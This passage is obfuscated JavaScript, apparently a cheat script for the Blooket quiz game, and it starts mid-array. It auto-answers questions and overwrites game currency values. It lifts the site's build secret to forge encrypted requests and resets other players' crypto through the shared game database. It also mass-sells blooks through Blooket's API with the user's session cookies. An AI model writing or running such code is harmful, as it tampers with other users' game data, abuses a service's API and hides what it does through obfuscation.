x20am','mber','17136hMfwLt','Gave','then','widt','user','ook','10px','remo','y\x20Ba','le\x20m','et\x20c','he\x20p','ter','disp','SHA-','\x20Are','cons','gues','om\x20p','ll\x20B','Stat','Meow','g\x20th','re\x20y','il.d','hang','e\x20\x27B','\x20Bas','tch\x20','enem','auth','getI','1784756VQcFEV','e\x20wi','wvPR','ling','ayer','o\x20se','nuse','rify','\x20bat','f\x20my','ev)\x20','duck','RJDK','ant\x20','30px','stag','foun','nce\x20','ttom','keyp','hado','xKMx','rTex','ward','rati','bsGJ','leng','7328628TltKFN','api.','1336730CSkETj','http','body','DFts','dail','limi','Win','d-re','t\x20hi','fire','dQYV','\x20but','appl','for\x20','Inco','orBj','tion','padd','Unlo','\x20fas','inne','ectA','\x20amo','ain\x20','t\x20fe','danc','WCUr','myLi','u\x0a\x0aH','\x20mul','256','aila','s/bl','tor','pend','u\x27re','ttaJ','dius','weig','ount','\x20sur','itie','Inst','incl','fact','ure\x20','upli','filt','tran','Pres','Gues','GCM','bLDe','LqCx','memo','chin','\x20Pla','ner','AES-','truc','yQlI','ttin','late','Hack','\x20fin','PUT','OaNu','catc','uchs','ingP','ts..','fill','d\x20in','raw','to!','roun','ve\x20l','Cust','s/ad','corr','xOf','loca','clic','Weig','ing','es\x20o','+)+$','moun','ve\x20h','I\x20li','inde','nter','setT','cryp','clas','xt\x20w','Must','hack','tche','euWZ','some','ect\x20','vkgO','\x20Ene','rror','tart','join','g\x20au','he\x20f','towe','\x20tak','pric','mit!','Sell','mate','otke','forE','mpat','iovy','eUpd','Prop','k\x20Fo','ypt','CtMN','raci','ecto','/pla','Auto','256728hxlFsB','forc','auto','ata.','AhuG','cate','PpAV','stri','If\x20y','-ses','Alri','omet','rred','colo','ByHF','as\x20a','word','\x20can','\x20of\x20','of\x20g','t,\x20p','nnMC','gbas','nse','amou','font','\x20con','Ngct','s://','in?','Toke','dn\x27t','Leve','ket\x0a','dom','getR','VHxh','t\x20be','fXcf','nBlo','?\x20(w','stoc','lobb','ack\x27','SvBr','teEl','eatu','base','com','assw','toSt','ized','BNCt','ng\x20y','pass','spli','23672iQqOCg','om/c','to\x20a','bloc','vent','onto','JVjo','bg-a','pt\x20b','life','dy\x27]','quer','look','QhtW','dama','y\x20To','\x20log','left','key','live','ghAU','sear','leve','Cryp','in\x20a','Sold','3170nxUrjk','bold','1.5r','addE','sil.',':swa','ions','emie','htMa','rush','bloo','g\x20bo','ques','Coul','cafe','Hand','tyle','ies','DgRt','take'];gbasilDotDev_F=function(){return kL;};return gbasilDotDev_F();}gbasilDotDev_v(),((()=>{const kK=gbasilDotDev_D;function i(im){const iy=gbasilDotDev_D;if(iy(0x202)+'m'===iy(0x202)+'m')try{if(iy(0x246)+'m'===iy(0x309)+'d'){if(B){const iV=C[iy(0x168)+'y'](O,arguments);return w=null,iV;}}else Array['from'](document[iy(0x15e)][iy(0x21f)+iy(0x33c)+'ecto'+iy(0x2b8)]('div'))[iy(0x18b)+'er'](iV=>iV[iy(0x170)+iy(0x28b)+'L']==im[iy(0x192)+iy(0x20f)+iy(0x133)+'e'][iy(0x23a)+iy(0x16c)]['corr'+'ectA'+'nswe'+'rs'][-0x1*0x2589+-0x3ac+0x2935])[-0x18*-0x132+0x1ac8+-0x3778]['clic'+'k']();}catch{if(iy(0x374)+'r'===iy(0x36d)+'N')iF[iy(0x192)+iy(0x20f)+iy(0x133)+'e'][iy(0x238)+'ks'][iy(0x1d0)+iy(0x388)](ic=>ic[iy(0x22a)+'l']=ic[iy(0x1cb)+'e']['leng'+'th']);else try{if(iy(0x1e2)+'K'!==iy(0x15f)+'z')Array['from'](document[iy(0x15e)][iy(0x21f)+iy(0x33c)+iy(0x1d9)+iy(0x2b8)](iy(0x2a7)))[iy(0x18b)+'er'](ic=>ic['inne'+iy(0x28b)+'L']==im[iy(0x192)+iy(0x20f)+iy(0x1d4)+'s'][iy(0x341)+'nt'][iy(0x23a)+iy(0x16c)][iy(0x1ab)+iy(0x171)+iy(0x249)+'rs'][0x22e4+-0x1c2b+-0x6b9])[0x1ef7*0x1+0x1aaa+-0x39a1*0x1][iy(0x1ae)+'k']();else{if(Z['stat'+'us']==0x1ccd*0x1+-0x1623+-0x4fd)return i7('Rate'+iy(0x161)+iy(0x164)+'t,\x20p'+iy(0x370)+'e\x20tr'+iy(0x294)+iy(0x173)+iy(0x19a)+'r');iD++,n==V&&t('Sold'+'\x20'+iX+(iy(0x387)+'ok')+(i8!=0x1e10+0x2183+-0x3f92?'s':''));}}catch{}}else iF['memo'+iy(0x20f)+iy(0x133)+'e'][iy(0x1bd)]='';}function t(im){const iK=gbasilDotDev_D;iK(0x200)+'a'!==iK(0x362)+'p'?im['stat'+iK(0x26d)+'e']['forc'+'eUpd'+'ate']():iF(iK(0x251)+iK(0x1c4)+iK(0x2cf)+iK(0x1e8)+'!');}function n(){const iL=gbasilDotDev_D;if('OjkD'+'y'===iL(0x353)+'y'){let im=document['quer'+iL(0x33c)+iL(0x1d9)+'r']('div['+'clas'+iL(0x2c1)+iL(0x347)+iL(0x313)+iL(0x21e)),iQ=Object[iL(0x37d)](im)['filt'+'er'](iV=>iV[iL(0x1b6)+iL(0x1ac)](iL(0x355)+iL(0x260)+iL(0x218)+iL(0x23d)+iL(0x257))>=0xbca+-0x25*0xf1+0x170b)[0x11b9*-0x1+0x59*-0x6a+-0x1*-0x3693];return im[iQ][iL(0x391)+iL(0x38f)][-0xdd1+-0x3*-0x905+-0xd3d][iL(0x354)+'er'];}else{const ic=D[iL(0x168)+'y'](B,arguments);return J=null,ic;}}function m(im){const iM=gbasilDotDev_D;if('vkgO'+'q'!==iM(0x1c2)+'q'){let iV=iC(iM(0x289)+iM(0x172)+'unt');if(!iq(iV))return iV(iM(0x35b)+iM(0x27a)+iM(0x25c)+'t');Z[iM(0x192)+'ized'+iM(0x133)+'e'][iM(0x2d0)]=i7(iV);}else return!(!im||isNaN(parseFloat(im)));}function Q(im){const iH=gbasilDotDev_D;if(iH(0x141)+'o'!=='wvPR'+'o')iF['stat'+iH(0x26d)+'e'][iH(0x1dd)+iH(0x1d3)+iH(0x2fa)]();else{let iV=prompt('Cash'+iH(0x172)+'unt');if(!m(iV))return alert(iH(0x35b)+'lid\x20'+iH(0x25c)+'t');im['memo'+iH(0x20f)+iH(0x133)+'e'][iH(0x23c)+iH(0x305)]=parseInt(iV);}}function V(im){const ie=gbasilDotDev_D;ie(0x381)+'K'===ie(0x302)+'Y'?(iq['key']=='w'&&(t[ie(0x2a9)+'e'][ie(0x3a8)+'lay']=Z[ie(0x2a9)+'e']['disp'+'lay']=='none'?'bloc'+'k':ie(0x375)),i7['key']=='q'&&iD(n())):document['loca'+'tion'][ie(0x26c)+ie(0x33d)]!='/caf'+'e'?alert(ie(0x18d)+ie(0x2ac)+ie(0x139)+'ack\x27'+ie(0x167)+ie(0x24b)):im[ie(0x192)+'ized'+ie(0x133)+'e']['food'+'s'][ie(0x1d0)+ie(0x388)](iV=>iV[ie(0x205)+'k']=0x1c49d*0x1+-0x91e4+0x53e6);}function c(im){const is=gbasilDotDev_D;if(is(0x154)+'h'!==is(0x1bf)+'s')Object[is(0x37d)](im[is(0x192)+'ized'+is(0x133)+'e'][is(0x267)+is(0x185)+'s'])[is(0x1d0)+is(0x388)](iQ=>im[is(0x192)+is(0x20f)+'Stat'+'e'][is(0x267)+is(0x185)+'s'][iQ]=0x4*0x870+0x8*-0x45f+0x139);else{let iV=iO['quer'+'ySel'+'ecto'+'r'](is(0x29b)+'clas'+is(0x2c1)+is(0x347)+is(0x313)+is(0x21e)),ic=i6[is(0x37d)](iV)[is(0x18b)+'er'](ig=>ig[is(0x1b6)+is(0x1ac)](is(0x355)+is(0x260)+is(0x218)+is(0x23d)+is(0x257))>=0x3a6*-0x1+-0x314*0x8+0x1c46)[-0x1*-0x2271+0xea+-0xbc9*0x3];return iV[ic][is(0x391)+is(0x38f)][0x1c59+0x1f78+-0x3bd0]['_own'+'er'];}}function d(im){const iv=gbasilDotDev_D;if('uFjM'+'z'!=='xZmg'+'O'){let iQ=prompt('Cryp'+iv(0x216)+iv(0x1b3)+'t');if(!m(iQ))return alert('Inva'+iv(0x27a)+iv(0x25c)+'t');im['memo'+iv(0x20f)+'Stat'+'e'][iv(0x1b9)+'to']=parseInt(iQ);}else iF['stat'+iv(0x26d)+'e'][iv(0x1c9)+'rs'][iv(0x1d0)+iv(0x388)](ic=>{ic['dama'+'ge']=0x2a0f2b0+-0xad41842+0x1*0xe290691,ic['full'+'Cd']=0x58*-0x33+-0x250f+-0x145*-0x2b+0.001;});}function o(im){const iu=gbasilDotDev_D;iu(0x176)+'G'===iu(0x176)+'G'?im[iu(0x192)+iu(0x20f)+iu(0x133)+'e'][iu(0x212)+'word']=prompt(iu(0x1a9)+iu(0x131)+iu(0x20d)+iu(0x26a)):i6[iu(0x2f0)](b['body'][iu(0x21f)+iu(0x33c)+iu(0x1d9)+iu(0x2b8)](iu(0x2a7)))['filt'+'er'](iV=>iV[iu(0x170)+'rHTM'+'L']==iq[iu(0x192)+'ized'+iu(0x133)+'e'][iu(0x23a)+iu(0x16c)][iu(0x1ab)+iu(0x171)+'nswe'+'rs'][-0x1204+-0x1*0x25+-0x1*-0x1229])[0x52*-0x46+0x23a0*-0x1+-0x3a0c*-0x1][iu(0x1ae)+'k']();}function a(im){const iS=gbasilDotDev_D;if('ZNqg'+'s'===iS(0x2e9)+'s'){let iQ=Array[iS(0x2f0)](document['quer'+iS(0x33c)+iS(0x1d9)+iS(0x2b8)](iS(0x2a7)))[iS(0x303)](iV=>iV[iS(0x170)+'rTex'+'t']==im[iS(0x192)+iS(0x20f)+iS(0x133)+'e'][iS(0x1ab)+iS(0x2dd)+iS(0x20d)+iS(0x26a)]);iQ&&iQ[iS(0x1ae)+'k']();}else{let ic=iC(iS(0x2c3)+iS(0x2b9)+iS(0x39a));if(!iq(ic))return ic(iS(0x35b)+'lid\x20'+iS(0x25c)+'t');Z['memo'+iS(0x20f)+iS(0x133)+'e'][iS(0x1a7)+'d']=i7(ic);}}function l(im){const iE=gbasilDotDev_D;if(iE(0x2d9)+'M'==='AzmD'+'M')im[iE(0x192)+'ized'+iE(0x133)+'e']['hack']='';else{let iV=iC('Gues'+iE(0x360)+iE(0x183));if(!iq(iV))return iV(iE(0x35b)+iE(0x27a)+iE(0x25c)+'t');Z[iE(0x192)+iE(0x20f)+iE(0x133)+'e'][iE(0x130)+iE(0x35a)+'re']=i7(iV);}}function Z(im){const iA=gbasilDotDev_D;if('BjZx'+'N'===iA(0x2f9)+'q')b(iC),iq(t);else{let iV=prompt(iA(0x34a)+iA(0x1ee)+'play'+'er');!iV||im[iA(0x192)+'ized'+iA(0x1d4)+'s'][iA(0x165)+iA(0x20b)][iA(0x2d7)+'atab'+iA(0x2f8)+'al'](im['memo'+iA(0x20f)+'Prop'+'s'][iA(0x341)+'nt'][iA(0x245)+'Id'],'c',(...ic)=>{const iW=iA;if(iW(0x210)+'c'!==iW(0x345)+'T'){let ig=Object[iW(0x37d)](ic[-0x2*-0xa61+0x9*-0x8b+-0x11*0xef]);ig[iW(0x1c0)](iR=>iR==iV)?ig[iW(0x1d0)+iW(0x388)]((iR,id)=>{const ib=iW;ib(0x373)+'a'!=='hfcY'+'a'?iF(ib(0x23b)+ib(0x33b)+ib(0x174)+ib(0x13b)+ib(0x13d)+ib(0x25d)+ib(0x314)):iR==iV&&(im[ib(0x192)+ib(0x20f)+ib(0x1d4)+'s'][ib(0x165)+ib(0x20b)][ib(0x25b)+'al']({'id':im[ib(0x192)+ib(0x20f)+ib(0x1d4)+'s']['clie'+'nt'][ib(0x245)+'Id'],'path':'c/'+im['memo'+ib(0x20f)+ib(0x1d4)+'s'][ib(0x341)+'nt'][ib(0x33d)],'val':{'p':im[ib(0x192)+ib(0x20f)+'Stat'+'e'][ib(0x212)+ib(0x1ec)],'b':im[ib(0x192)+'ized'+'Prop'+'s'][ib(0x341)+'nt']['bloo'+'k'],'cr':im[ib(0x192)+ib(0x20f)+'Stat'+'e']['cryp'+'to'],'tat':iR+':'+(ic[-0xa27+-0x679*0x2+-0x1*-0x1719][iR]['cr']||-0x13d5+-0xefe*0x2+0x147*0x27)}}),alert(ib(0x2f2)+'ttin'+ib(0x135)+ib(0x2b4)+ib(0x1b9)+ib(0x1a6)));}):alert(iW(0x23b)+iW(0x1fb)+iW(0x19c)+iW(0x2c4)+iW(0x143)+'!');}else iF[iW(0x2a5)+iW(0x26d)+'e'][iW(0x13c)+iW(0x23f)]=[];});}}function e(im){const k0=gbasilDotDev_D;if(k0(0x378)+'Z'!==k0(0x1f1)+'N')im[k0(0x192)+k0(0x20f)+k0(0x133)+'e']['danc'+'e']=!(-0x7*-0x49d+0x22b5+-0x42ff),im[k0(0x192)+k0(0x20f)+'Stat'+'e']['joke']=!(0x178a+0x890*-0x1+-0xef9*0x1),im[k0(0x192)+k0(0x20f)+k0(0x133)+'e']['lol']=!(-0x5*-0x77e+-0x5*0x65b+0x2*-0x2d7),im[k0(0x192)+k0(0x20f)+'Stat'+'e']['slow']=!(-0x3*0x171+0x1*0x20cc+-0x1c78);else{let iV=i6[k0(0x368)+k0(0x37f)+k0(0x30e)][k0(0x38a)](ic=>iV[k0(0x37d)](ic[0xc31+-0x5c+-0xbd4])[k0(0x38a)](ig=>ic[-0xbc*0x2f+0x11e7+0x109e][ig]))[k0(0x31d)+'ce']((ic,ig)=>[...ic,...ig],[])[k0(0x303)](ic=>/\"\w{8}-\w{4}-\w{4}-\w{4}-\w{12}\"/[k0(0x287)](ic[k0(0x20e)+k0(0x35c)]())&&/\(new TextEncoder\)\.encode\(\"(.+?)\"\)/[k0(0x287)](ic['toSt'+'ring']()))['toSt'+k0(0x35c)]();iC({'blooketBuild':iV[k0(0x384)+'h'](/\w{8}-\w{4}-\w{4}-\w{4}-\w{12}/)[-0xe6b+-0x1a5*-0xe+-0x89b],'secret':iV['matc'+'h'](/\(new TextEncoder\)\.encode\(\"(.+?)\"\)/)[-0x1*0x4d5+0x16b2+-0x5f4*0x3]});}}function b(im){const k1=gbasilDotDev_D;if(k1(0x28d)+'y'===k1(0x28d)+'y')im[k1(0x192)+k1(0x20f)+k1(0x133)+'e'][k1(0x238)+'ks'][k1(0x1d0)+k1(0x388)](iQ=>iQ['time'][k1(0x1a3)](-0x11b5+0x111e+0x97+0.001));else return F[k1(0x20e)+k1(0x35c)]()[k1(0x229)+'ch']('(((.'+'+)+)'+'+)+$')[k1(0x20e)+'ring']()[k1(0x3ab)+k1(0x197)+k1(0x17d)](D)[k1(0x229)+'ch'](k1(0x306)+k1(0x390)+k1(0x1b2));}function i0(im){const k2=gbasilDotDev_D;k2(0x334)+'Z'!==k2(0x334)+'Z'?b||(iC(iq),t=!(0x1e00+-0x3d*0x40+0xec0*-0x1)):im[k2(0x192)+k2(0x20f)+k2(0x133)+'e'][k2(0x386)+k2(0x33a)+'Need'+'ed']=-0x20a+0x1350*-0x1+0xb*0x1f1;}function i1(im){const k3=gbasilDotDev_D;if(k3(0x350)+'q'!==k3(0x350)+'q'){let iV=iC('Cryp'+k3(0x216)+k3(0x1b3)+'t');if(!iq(iV))return iV(k3(0x35b)+k3(0x27a)+k3(0x25c)+'t');Z[k3(0x192)+k3(0x20f)+k3(0x133)+'e'][k3(0x1b9)+'to']=i7(iV);}else im[k3(0x192)+'ized'+k3(0x133)+'e'][k3(0x238)+'ks']['forE'+'ach'](iV=>iV[k3(0x22a)+'l']=iV[k3(0x1cb)+'e'][k3(0x159)+'th']);}function i2(im){const k4=gbasilDotDev_D;if(k4(0x2f1)+'Y'!=='KUdX'+'Y')V==t&&(iX[k4(0x192)+k4(0x20f)+k4(0x1d4)+'s'][k4(0x165)+k4(0x20b)][k4(0x25b)+'al']({'id':i8[k4(0x192)+k4(0x20f)+k4(0x1d4)+'s'][k4(0x341)+'nt'][k4(0x245)+'Id'],'path':'c/'+it[k4(0x192)+'ized'+k4(0x1d4)+'s']['clie'+'nt']['name'],'val':{'p':m['memo'+k4(0x20f)+k4(0x133)+'e'][k4(0x212)+k4(0x1ec)],'b':Q['memo'+'ized'+k4(0x1d4)+'s'][k4(0x341)+'nt'][k4(0x238)+'k'],'cr':V[k4(0x192)+k4(0x20f)+k4(0x133)+'e']['cryp'+'to'],'tat':c+':'+(Q[-0x2345+0x81d+0x1b28][i9]['cr']||-0x1b7b+0x45d*0x4+0xa07)}}),d('Rese'+'ttin'+'g\x20th'+k4(0x2b4)+'cryp'+'to!'));else{let iV=prompt(k4(0x1af)+'ht');if(!m(iV))return alert(k4(0x35b)+k4(0x27a)+'inpu'+'t');im['memo'+k4(0x20f)+'Stat'+'e'][k4(0x182)+'ht']=parseInt(iV);}}var i3=()=>new Promise((im,iQ)=>{const k5=gbasilDotDev_D;if(k5(0x2ef)+'k'!==k5(0x2c2)+'j')try{if('aRCh'+'I'===k5(0x1f7)+'j'){let ic=b();try{Z(ic),i7(ic);}catch{n(k5(0x251)+k5(0x1c4)+k5(0x2cf)+k5(0x1e8)+'!');}}else{let ic=window[k5(0x368)+k5(0x37f)+k5(0x30e)][k5(0x38a)](ig=>Object[k5(0x37d)](ig[0x4ef*0x1+0x2*-0x88f+0xc30])['map'](iR=>ig[0x1d17+-0x1669+-0x6ad][iR]))[k5(0x31d)+'ce']((ig,iR)=>[...ig,...iR],[])[k5(0x303)](ig=>/\"\w{8}-\w{4}-\w{4}-\w{4}-\w{12}\"/['test'](ig['toSt'+'ring']())&&/\(new TextEncoder\)\.encode\(\"(.+?)\"\)/[k5(0x287)](ig[k5(0x20e)+k5(0x35c)]()))[k5(0x20e)+k5(0x35c)]();im({'blooketBuild':ic['matc'+'h'](/\w{8}-\w{4}-\w{4}-\w{4}-\w{12}/)[-0x2*0xb89+0x220b+-0xaf9],'secret':ic['matc'+'h'](/\(new TextEncoder\)\.encode\(\"(.+?)\"\)/)[0x5*0x5e9+0x36d*-0x5+0x1*-0xc6b]});}}catch{k5(0x24a)+'x'===k5(0x38b)+'w'?(i6[k5(0x3a2)+'ve'](),b['remo'+'veEv'+k5(0x2ad)+k5(0x38d)+k5(0x195)](k5(0x152)+k5(0x33a),iC,!(-0x3c*-0x3f+0x2f*-0x78+0x136*0x6))):iQ(k5(0x23b)+'d\x20no'+k5(0x174)+'tch\x20'+'auth'+k5(0x25d)+k5(0x314));}else{let id=iC(k5(0x305)+k5(0x172)+k5(0x24e));if(!iq(id))return id('Inva'+'lid\x20'+k5(0x25c)+'t');Z[k5(0x192)+'ized'+k5(0x133)+'e'][k5(0x23c)+'Cash']=i7(id);}}),i4=async(im,iQ)=>{const k6=gbasilDotDev_D;if(k6(0x236)+'o'===k6(0x236)+'o'){let iV=new TextEncoder()[k6(0x32c)+'de'](JSON[k6(0x1e3)+'ngif'+'y'](im)),ic=new TextEncoder()[k6(0x32c)+'de'](iQ),ig=await window[k6(0x1b9)+'to'][k6(0x2f6)+'le'][k6(0x2b6)+'st'](k6(0x3a9)+k6(0x17a),ic),iR=await window[k6(0x1b9)+'to'][k6(0x2f6)+'le']['impo'+'rtKe'+'y'](k6(0x1a5),ig,{'name':k6(0x196)+k6(0x18f)},!(0xdaf+-0x1*0x46d+-0x941),[k6(0x338)+k6(0x1d6)]),id=window[k6(0x1b9)+'to'][k6(0x1ff)+k6(0x279)+k6(0x2ca)+'ues'](new Uint8Array(-0x1d04+-0x80b+0x54d*0x7)),ip=Array[k6(0x2f0)](id)[k6(0x38a)](io=>String[k6(0x2f0)+'Char'+'Code'](io))[k6(0x1c6)](''),iP=await window[k6(0x1b9)+'to'][k6(0x2f6)+'le'][k6(0x338)+k6(0x1d6)]({'name':k6(0x196)+k6(0x18f),'iv':id},iR,iV),iU=Array[k6(0x2f0)](new Uint8Array(iP))[k6(0x38a)](io=>String[k6(0x2f0)+k6(0x284)+'Code'](io))[k6(0x1c6)]('');return window[k6(0x2ab)](ip+iU);}else i6[k6(0x37d)](b['memo'+'ized'+k6(0x133)+'e'][k6(0x267)+k6(0x185)+'s'])['forE'+'ach'](ia=>iq[k6(0x192)+k6(0x20f)+k6(0x133)+'e'][k6(0x267)+k6(0x185)+'s'][ia]=-0x1e43*-0x1+-0x2287+0x445);};async function i5(){const k7=gbasilDotDev_D;if(k7(0x2c0)+'i'!=='bAmp'+'w'){if(prompt(k7(0x30b)+k7(0x2da)+k7(0x220)+k7(0x3a5)+k7(0x138)+k7(0x1b1)+k7(0x29d)+k7(0x148)+k7(0x1f6)+k7(0x2e6)+k7(0x30c)+k7(0x27f)+k7(0x20a)+k7(0x33f)+k7(0x1eb)+k7(0x2d6)+k7(0x150)+k7(0x1ef)+k7(0x319)+k7(0x211)+k7(0x244)+'acco'+'unt\x20'+k7(0x328)+k7(0x343)+k7(0x1e4)+k7(0x348)+k7(0x140)+'llin'+'g\x20to'+k7(0x1ca)+'e\x20th'+k7(0x339)+k7(0x270)+k7(0x243)+k7(0x2b0)+'ligh'+'t\x20co'+k7(0x2f7)+'ienc'+k7(0x380)+k7(0x1b7)+'\x20\x22I\x20'+k7(0x227)+k7(0x358)+k7(0x2bd)+k7(0x293)+k7(0x16f)+k7(0x2ba)+k7(0x269)+k7(0x310)+k7(0x3a6)+k7(0x2cd)+k7(0x201)+k7(0x2e8))!=k7(0x1b5)+k7(0x1a8)+k7(0x325)+k7(0x310)+k7(0x1c8)+k7(0x337)+k7(0x33e))return alert(k7(0x1e6)+'ght,'+'\x20exi'+k7(0x255)+'.');let im=await(await fetch(k7(0x15d)+k7(0x1f8)+k7(0x15b)+k7(0x238)+'ket.'+k7(0x394)+k7(0x28f)+k7(0x39f)+k7(0x2dc)+'rify'+k7(0x1e5)+k7(0x38c),{'credentials':'incl'+k7(0x324)}))[k7(0x2a4)]();if(im!=null&&im['name'])im=im[k7(0x33d)];else return alert(k7(0x23b)+k7(0x1fb)+'\x20get'+'\x20nam'+k7(0x286)+k7(0x136)+'ou\x20s'+k7(0x189)+'you\x27'+'re\x20l'+k7(0x2de)+k7(0x1a4)+'?');let iQ=!(-0x2*0x801+0x935*0x1+0x6ce),iV=ic=>{const k8=k7;k8(0x301)+'N'!==k8(0x301)+'N'?iO['memo'+k8(0x20f)+k8(0x133)+'e'][k8(0x386)+k8(0x33a)]=i6['memo'+'ized'+'Stat'+'e'][k8(0x2b7)+k8(0x322)+'nt']:iQ||(alert(ic),iQ=!(-0x2*-0x2e8+-0x26e6+0x2116));};fetch(k7(0x15d)+k7(0x1f8)+k7(0x15b)+k7(0x238)+k7(0x261)+k7(0x394)+k7(0x28f)+k7(0x39f)+k7(0x17c)+k7(0x266),{'credentials':'incl'+'ude'})['then'](async ic=>{const k9=k7;if('Jbmf'+'h'!==k9(0x29a)+'h')iO[k9(0x192)+'ized'+'Stat'+'e'][k9(0x2e1)+k9(0x291)+k9(0x266)]=[],i6[k9(0x192)+k9(0x20f)+k9(0x133)+'e'][k9(0x241)+k9(0x203)+k9(0x272)]=[];else{let iR=await ic[k9(0x2a4)](),id=0x163e+-0xb9*0x1e+-0x3*0x30,ip=Object[k9(0x37d)](iR)[k9(0x38a)](iP=>iR[iP]-(-0x23e0+-0x2327+0x4708))[k9(0x31d)+'ce']((iP,iU)=>iP+iU,0x9*0x279+0x348+-0x3*0x883);if(ip==-0x223*0x8+-0x15b1+-0x1*-0x26c9)return alert('No\x20d'+k9(0x18a)+k9(0x1e1)+k9(0x387)+k9(0x2b1));Object[k9(0x37d)](iR)[k9(0x1d0)+k9(0x388)](iP=>{const ki=k9;if('FGVG'+'L'===ki(0x265)+'L')iR[iP]--,!(iR[iP]<=-0x26c4+-0x7*0x3f4+0x4270)&&fetch(ki(0x15d)+ki(0x1f8)+ki(0x15b)+'bloo'+ki(0x261)+ki(0x394)+ki(0x28f)+ki(0x39f)+ki(0x344)+ki(0x273)+'ook',{'credentials':ki(0x187)+ki(0x324),'body':JSON['stri'+'ngif'+'y']({'name':im,'blook':iP,'numSold':iR[iP]}),'method':ki(0x369)})[ki(0x39d)](iU=>{const kk=ki;if(kk(0x1e0)+'E'!==kk(0x1e0)+'E'){let ia=V('Name'+kk(0x1ee)+'play'+'er');!ia||t['memo'+kk(0x20f)+kk(0x1d4)+'s'][kk(0x165)+kk(0x20b)][kk(0x2d7)+kk(0x288)+kk(0x2f8)+'al'](iX[kk(0x192)+'ized'+kk(0x1d4)+'s']['clie'+'nt'][kk(0x245)+'Id'],'c',(...iI)=>{const kF=kk;let iN=ia[kF(0x37d)](iI[0x26d2+0x185*0x11+0x40a7*-0x1]);iN[kF(0x1c0)](il=>il==ia)?iN[kF(0x1d0)+kF(0x388)]((il,iT)=>{const kD=kF;il==ia&&(iI['memo'+'ized'+kD(0x1d4)+'s'][kD(0x165)+kD(0x20b)][kD(0x25b)+'al']({'id':iN['memo'+kD(0x20f)+kD(0x1d4)+'s'][kD(0x341)+'nt']['host'+'Id'],'path':'c/'+i5[kD(0x192)+'ized'+kD(0x1d4)+'s']['clie'+'nt']['name'],'val':{'p':ih[kD(0x192)+kD(0x20f)+kD(0x133)+'e'][kD(0x212)+kD(0x1ec)],'b':i4[kD(0x192)+kD(0x20f)+kD(0x1d4)+'s'][kD(0x341)+'nt'][kD(0x238)+'k'],'cr':i3['memo'+'ized'+kD(0x133)+'e'][kD(0x1b9)+'to'],'tat':il+':'+(iI[-0x2403+-0x10bd+0x34c0][il]['cr']||0x1*0x301+-0x11ac+0x1*0xeab)}}),ix(kD(0x2f2)+kD(0x199)+kD(0x135)+kD(0x2b4)+kD(0x1b9)+'to!'));}):i0(kF(0x23b)+kF(0x1fb)+kF(0x19c)+kF(0x2c4)+'ayer'+'!');});}else{if(iU[kk(0x2a5)+'us']==0x1*-0x163c+0x187*-0x13+0xa96*0x5)return iV('Rate'+kk(0x161)+kk(0x164)+kk(0x1f0)+kk(0x370)+kk(0x26f)+kk(0x294)+kk(0x173)+kk(0x19a)+'r');id++,id==ip&&alert('Sold'+'\x20'+ip+(kk(0x387)+'ok')+(ip!=0x8d9+0x2065+-0x17*0x1cb?'s':''));}})[ki(0x19f)+'h'](iU=>{const kB=ki;if('zubT'+'m'===kB(0x1d2)+'c')try{iq[kB(0x2f0)](im[kB(0x15e)][kB(0x21f)+kB(0x33c)+'ecto'+'rAll']('div'))['filt'+'er'](ia=>ia['inne'+kB(0x28b)+'L']==i7[kB(0x192)+kB(0x20f)+'Prop'+'s'][kB(0x341)+'nt'][kB(0x23a)+kB(0x16c)][kB(0x1ab)+kB(0x171)+kB(0x249)+'rs'][-0x2*-0x5ef+-0x26ea+0x1b0c])[-0x26fa+-0x251a*0x1+0x4c14*0x1][kB(0x1ae)+'k']();}catch{}else alert(kB(0x251)+kB(0x1c4)+kB(0x2cf)+kB(0x1e8)+kB(0x2c8)+kB(0x142)+kB(0x387)+kB(0x2b1));});else{let io=t[ki(0x37d)](iX[-0x1*0x246d+0x1*0xc67+0xf6*0x19]);io[ki(0x1c0)](ia=>ia==io)?io['forE'+ki(0x388)]((ia,iI)=>{const kJ=ki;ia==io&&(iQ['memo'+kJ(0x20f)+kJ(0x1d4)+'s'][kJ(0x165)+'base'][kJ(0x25b)+'al']({'id':io['memo'+kJ(0x20f)+kJ(0x1d4)+'s'][kJ(0x341)+'nt']['host'+'Id'],'path':'c/'+a[kJ(0x192)+kJ(0x20f)+kJ(0x1d4)+'s'][kJ(0x341)+'nt'][kJ(0x33d)],'val':{'p':i1['memo'+kJ(0x20f)+kJ(0x133)+'e'][kJ(0x212)+'word'],'b':iP['memo'+'ized'+kJ(0x1d4)+'s']['clie'+'nt'][kJ(0x238)+'k'],'cr':i0['memo'+kJ(0x20f)+kJ(0x133)+'e'][kJ(0x1b9)+'to'],'tat':ia+':'+(o[0x2206+-0x22d4+-0x1*-0xce][ia]['cr']||-0x1e1f+0x61*-0x5+0xc*0x2ab)}}),Z('Rese'+kJ(0x199)+kJ(0x135)+'eir\x20'+kJ(0x1b9)+'to!'));}):e('Coul'+ki(0x1fb)+ki(0x19c)+'d\x20pl'+'ayer'+'!');}});}})[k7(0x19f)+'h'](ic=>{const kr=k7;kr(0x191)+'v'===kr(0x191)+'v'?alert(kr(0x251)+kr(0x1c4)+kr(0x2cf)+kr(0x1e8)+kr(0x2af)+kr(0x193)+kr(0x340)+'ooks'+'!'):iF[kr(0x192)+kr(0x20f)+kr(0x133)+'e'][kr(0x238)+'ks']['forE'+'ach'](iR=>iR[kr(0x2a3)]['fill'](0x1035+0x23*-0xa6+-0x1*-0x67d+0.001));});}else iO[k7(0x222)+'ge']=0x11*0x2be496+-0x67524b*-0x14+-0x506bad3,i6[k7(0x332)+'Cd']=-0x25f7+-0x1bd3+-0xaf7*-0x6+0.001;}function i6(){const kt=gbasilDotDev_D;if(kt(0x32d)+'C'!==kt(0x32e)+'d')fetch(kt(0x15d)+kt(0x1f8)+kt(0x15b)+kt(0x238)+kt(0x261)+'com/'+'api/'+kt(0x39f)+'s/ve'+kt(0x146)+'-tok'+'en',{'credentials':'incl'+kt(0x324)})['then'](im=>im['json']())['then'](({name:im})=>{const 